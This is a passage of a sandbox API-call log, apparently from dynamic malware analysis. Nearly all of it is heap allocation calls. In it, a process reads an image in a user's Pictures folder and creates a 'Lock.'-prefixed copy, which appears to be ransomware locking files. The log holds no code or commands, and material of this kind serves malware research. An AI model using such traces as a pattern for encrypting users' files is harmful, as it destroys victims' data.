hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0210.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0210.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0210.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0210.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0210.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0210.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0210.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0210.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0210.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75380 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69c10 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.931] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0210.931] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0210.931] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0210.931] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0210.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0210.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x37c0048 [0210.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0210.933] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/mwiYwwD-pGtpU_YSC3.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\mwiywwd-pgtpu_ysc3.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0210.933] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.933] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0210.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0210.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0210.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0210.934] TranslateMessage (lpMsg=0x8cf708) returned 0 [0210.934] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0210.934] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0210.934] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0210.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0210.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0210.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a73e30 [0210.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.935] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0210.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e30 | out: hHeap=0x2af0000) returned 1 [0210.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0210.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a930 [0210.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0210.936] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.mwiYwwD-pGtpU_YSC3.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.mwiywwd-pgtpu_ysc3.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0210.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0210.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.937] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0210.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0210.937] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0210.937] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0210.937] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0210.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0210.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0210.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.938] HeapFree (in: 